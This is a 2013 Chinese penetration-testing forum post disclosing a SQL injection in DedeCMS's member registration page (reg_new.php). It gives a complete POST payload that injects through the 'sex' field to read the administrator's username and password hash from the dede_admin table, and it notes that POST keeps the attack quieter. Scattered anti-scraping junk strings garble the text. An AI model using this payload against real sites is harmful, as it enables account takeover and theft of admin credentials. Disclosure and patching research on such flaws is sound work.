中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
# p8 }) P; c7 S) v. o
简要描述:
5 |4 {0 m. H B5 D
0 Q; Y. b6 {+ R, J4 G
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
1 A0 k8 f# z1 P9 q: f5 _# J8 i
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
. y4 v5 t) h0 u9 z! A& X
详细说明:跟这个漏洞
& W5 E" A. b9 z. _1 E. J2 @/ F5 M/ c
- [, Z/ z% b) o9 ~' K( T! A
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
5 A1 i0 {( D( C0 ~- t/ t" Y
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
8 ~! ?: A: k! n4 ]5 \
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
1 w" `; N6 P o: g" U/ T
7 |3 W* L% Y: i0 L$ @. `
www.political-security.com/member/reg_new.php
( |- L) O2 ~% Q. ]
: e; @& [5 T% `3 b8 b- C
POST
& o% m# Q2 T' \8 s
( F T5 H9 M4 O$ C! f2 q1 U l
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
P& M Z9 B, J: X: l$ L E# d
userid=c4rp3nt3r&uname=c4rp3nt3r
7 e' N8 b z) q$ Z6 ?
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
' s5 ^/ M& `) g3 ?
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
& w. o+ h9 K1 p% G! p+ f9 ]
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
9 i' e; Q7 Y+ `/ q) W3 X
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2